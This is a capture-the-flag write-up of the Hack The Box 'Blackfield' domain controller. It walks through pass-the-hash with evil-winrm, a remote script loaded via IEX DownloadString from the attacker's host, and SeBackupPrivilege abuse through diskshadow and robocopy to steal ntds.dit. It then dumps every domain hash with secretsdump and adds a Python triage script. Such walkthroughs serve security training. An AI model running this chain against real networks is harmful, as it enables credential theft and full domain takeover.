sid S-1-5-96-0-2
...[snip]...
```
> We have an NTLM hash for svc_backup. With crackmapexec we can pass the hash and authenticate as svc_backup without ever knowing the password.
> Pass-the-hash (PtH) works because NTLM authentication never transmits the password: the client proves it knows the NT hash by keying an HMAC over the server's challenge. Whoever holds the hash can compute that response, so the hash is as good as the password for any NTLM-accepting service (Kerberos would instead need an overpass-the-hash to obtain a TGT).
> Since svc_backup is in the Remote Management Users group, it can use WinRM to get a shell on the DC.
```sh
┌──(kali㉿kali)-[~/HTB/blackfield/memory_analysis]
└─$ crackmapexec winrm 10.10.10.192 -d blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM 10.10.10.192 5985 10.10.10.192 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 10.10.10.192 [+] blackfield.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
```
> Evil-WinRM provides a shell:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be6****
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
```
### Priv: svc_backup –> administrator
#### Enumeration
```sh
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
```
> We do have SeBackupPrivilege, and SeRestorePrivilege alongside it.
> Checking svc_backup's group memberships:
```sh
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 9:54:48 AM
Password expires Never
Password changeable 2/24/2020 9:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 10:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
```
> The user is a member of **Backup Operators**, which is where SeBackupPrivilege comes from (the same line also shows the truncated 'Remote Management Users').
#### Abusing
> The SeBackupPrivilege privilege (https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/) is really interesting. It exists so that backup software can copy the whole system, and since you cannot back up what you cannot read, the system skips the file ACL check for reads when a file is opened with backup semantics (which tools like robocopy /b request).
> In a nutshell, it grants read access to any file regardless of its ACL, so in principle root.txt in the Administrator profile should be readable.
> The first thing I tried was Acl-FullControl.ps1 (https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1), which adds a FullControl ACE for svc_backup to the Administrator folder so it can be browsed normally.
> Setting it up: download the script on the attack box and serve it over HTTP for the target to fetch.
> ***Attacker machine***
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1
--2024-01-02 13:47:23-- https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 953 [text/plain]
Saving to: ‘Acl-FullControl.ps1’
Acl-FullControl.ps1 100%[======================================>] 953 --.-KB/s in 0s
2024-01-02 13:47:24 (29.6 MB/s) - ‘Acl-FullControl.ps1’ saved [953/953]
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.192 - - [02/Jan/2024 13:49:08] "GET /Acl-FullControl.ps1 HTTP/1.1" 200 -
```
> ***Remote machine***
```sh
*Evil-WinRM* PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.6/Acl-FullControl.ps1')
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
*Evil-WinRM* PS C:\> Acl-FullControl -user blackfield\svc_backup -path c:\users\administrator
[+] Current permissions:
Path : Microsoft.PowerShell.Core\FileSystem::C:\users\administrator
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
Audit :
Sddl : O:SYG:SYD:P(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)
[+] Changing permissions to c:\users\administrator
[+] Acls changed successfully.
Path : Microsoft.PowerShell.Core\FileSystem::C:\users\administrator
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
BLACKFIELD\svc_backup Allow FullControl
Audit :
Sddl : O:SYG:SYD:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)
*Evil-WinRM* PS C:\>
```
> The ACE was added (svc_backup now appears in the SDDL), but this did not get me the flag, lol; it was meant to work oo. Good thing there is another method up next: instead of reading Administrator's files, take the domain's secrets directly.
#### Dumping the NTDS.dit Hashes with SeBackupPrivilege
> NTDS.dit holds every domain account's password hash. If we try to copy it directly with robocopy /b, the backup flag gets us past the ACL but not past the lock: the directory service keeps the database open, so the copy fails with a sharing violation.
```sh
*Evil-WinRM* PS C:\> robocopy /b C:\Windows\NTDS C:\Profiles NTDS.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Tuesday, January 2, 2024 7:09:44 PM
Source : C:\Windows\NTDS\
Dest : C:\Profiles\
Files : NTDS.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 C:\Windows\NTDS\
New File 18.0 m ntds.dit
2024/01/02 19:09:44 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit
The process cannot access the file because it is being used by another process.
```
> For this reason we take a Volume Shadow Copy of the C:\ drive with diskshadow.exe and copy ntds.dit out of the snapshot, where nothing holds it open.
> diskshadow.exe is an interactive tool and Evil-WinRM only gives us a non-interactive session, so we write the commands to a text file and feed it in with the /s switch. `set context persistent nowriters` creates a snapshot that outlives the diskshadow session and skips the VSS writers, which is fine because all we want is a readable copy of one file. Remember to clean up afterwards (unexpose the drive letter and delete the shadow copy from a second diskshadow script, then remove C:\temp): a persistent, exposed snapshot of a DC is an obvious artifact for defenders and a second copy of the AD database left lying on disk.
> I used the following commands directly on the victim machine to craft the diskshadow.txt file:
> (`-encoding ascii` matters: Windows PowerShell's Out-File writes UTF-16 by default, which diskshadow will not parse.)
```sh
*Evil-WinRM* PS C:\> cd c:\
*Evil-WinRM* PS C:\> mkdir temp
*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 1/2/2024 7:44:58 PM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {9d0239b1-20b4-4d9b-bd00-172d5561efa0} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {e5b21137-0981-41b4-b7a4-20acb21bee85} set as environment variable.
Querying all shadow copies with the shadow copy set ID {e5b21137-0981-41b4-b7a4-20acb21bee85}
* Shadow copy ID = {9d0239b1-20b4-4d9b-bd00-172d5561efa0} %temp%
- Shadow copy set: {e5b21137-0981-41b4-b7a4-20acb21bee85} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 1/2/2024 7:44:59 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {9d0239b1-20b4-4d9b-bd00-172d5561efa0}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp>
```
> Seeing "The shadow copy was successfully exposed as z:\." kind of feels like a good thing.
> With the Z:\ drive exposed, I can now use robocopy again, but this time to copy the ntds.dit from the snapshot into my temp folder rather than the live one.
```sh
*Evil-WinRM* PS C:\temp> cd Z:
*Evil-WinRM* PS Z:\> cd windows
*Evil-WinRM* PS Z:\windows> cd ntds
*Evil-WinRM* PS Z:\windows\ntds> robocopy /b .\ C:\temp NTDS.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Tuesday, January 2, 2024 7:50:17 PM
Source : Z:\windows\ntds\
Dest : C:\temp\
Files : NTDS.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
...[snip]...
```
> After grabbing ntds.dit we also need the SYSTEM registry hive: it holds the boot key (SysKey) that secretsdump uses to decrypt the Password Encryption Key (PEK) inside ntds.dit, and without it none of the hashes can be recovered. `reg.exe save` on HKLM\SYSTEM also relies on SeBackupPrivilege, which svc_backup holds, so it works from the same shell. Both files then go to the attacker machine to be dumped offline.
>
> To exfiltrate them this time we can use Evil-WinRM's built-in download command, which writes into the current local directory:
```sh
*Evil-WinRM* PS Z:\windows\ntds> cd C:\temp
*Evil-WinRM* PS C:\temp> reg.exe save hklm\system C:\temp\system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system.bak
```
> Run secretsdump against the two files with the LOCAL target, which parses them offline and never touches the DC. Redirect the output to a file: the domain has over 300 accounts, and a plain-text file is far easier to grep and to feed to hashcat later (`-just-dc-ntlm` trims the output to the NTLM lines if the Kerberos keys are not needed).
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL > hashes.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cat hashes.txt | more
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
...[snip]...
:
BLACKFIELD.local\BLACKFIELD869335:1116:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD319016:1117:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD600999:1118:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD894905:1119:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD253541:1120:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD175204:1121:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
```
> Now that we have every hash in the domain, the domain belongs to us: the Administrator NT hash logs us in directly, and the krbtgt hash would let us forge Kerberos tickets. Note also that the BLACKFIELD###### accounts all share the same NT hash, i.e. the same password, which is exactly the kind of reuse a dump like this exposes.
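As an added example (not part of the original write-up), here is a small Python triage script for the secretsdump output redirected into hashes.txt. It parses the NTLM lines, groups accounts by NT hash to surface password reuse (as seen above, where the BLACKFIELD###### accounts all share one hash), flags empty passwords and stored LM hashes, and lists the accounts whose NT hash can be passed straight to Evil-WinRM with -H. The sample input embedded in the script is constructed from the lines shown above; the function and variable names are my own.

```python
"""Triage of an impacket-secretsdump NTDS dump (added example; not from the write-up).

Parses the  domain\\user:rid:lmhash:nthash:::  lines that secretsdump writes,
groups accounts by NT hash to expose password reuse, flags empty passwords and
stored LM hashes, and lists accounts whose NT hash can be passed directly.
"""
import re
from collections import defaultdict, namedtuple

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
NO_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM field when no LM hash is stored

Entry = namedtuple("Entry", "user rid lm nt")

# One NTLM line: optional DOMAIN\ prefix, RID, 32-hex LM hash, 32-hex NT hash, ':::'
_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample input: a subset of the hashes.txt produced above.
SAMPLE_DUMP = """\
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\\BLACKFIELD869335:1116:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\\BLACKFIELD319016:1117:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
"""


def parse_dump(text):
    """Return an Entry for every NTLM line; banner and [*] status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            entries.append(Entry(m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return entries


def sam_name(user):
    """Strip an optional DOMAIN\\ prefix, leaving the sAMAccountName."""
    return user.rsplit("\\", 1)[-1]


def classify(entry):
    """Well-known RIDs first, then machine accounts by the trailing '$'."""
    if entry.rid == 500:
        return "builtin-administrator"
    if entry.rid == 501:
        return "guest"
    if entry.rid == 502:
        return "krbtgt"
    if sam_name(entry.user).endswith("$"):
        return "machine"
    return "user"


def find_reuse(entries):
    """Map each NT hash used by two or more accounts to the accounts sharing it."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e.nt].append(sam_name(e.user))
    return {nt: users for nt, users in by_nt.items() if len(users) > 1}


def find_weak(entries):
    """Flag empty passwords and accounts that still have an LM hash stored."""
    findings = []
    for e in entries:
        if e.nt == EMPTY_NT:
            findings.append((sam_name(e.user), "empty password"))
        if e.lm != NO_LM:
            findings.append((sam_name(e.user), "LM hash stored"))
    return findings


def pth_targets(entries):
    """Accounts whose NT hash is directly usable for pass-the-hash over WinRM/SMB."""
    return [
        e for e in entries
        if classify(e) in ("builtin-administrator", "user") and e.nt != EMPTY_NT
    ]


def summarize(text):
    """Run every check over raw secretsdump output and return a plain dict."""
    entries = parse_dump(text)
    return {
        "accounts": len(entries),
        "reuse": find_reuse(entries),
        "weak": find_weak(entries),
        "pth": [sam_name(e.user) for e in pth_targets(entries)],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Run it as-is to see the checks over the embedded sample, or call summarize() on the contents of hashes.txt for the real dump. Guest is reported for an empty password even though that account is normally disabled: secretsdump prints hashes for disabled accounts too, so check account status before counting a finding.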
### Pass-the-Hash Attack to get a Shell as the Domain Admin Account
> We could try to crack the Administrator hash, but there is no need: WinRM accepts NTLM authentication, so Evil-WinRM can pass the NT hash directly with -H.
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629c7c67c8e29db269060c9****
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
```
> Boom, this method of priv escalation seems to work perfectly; I'm sticking with this method, wallahi. TIME TO EAT, I'm hungry.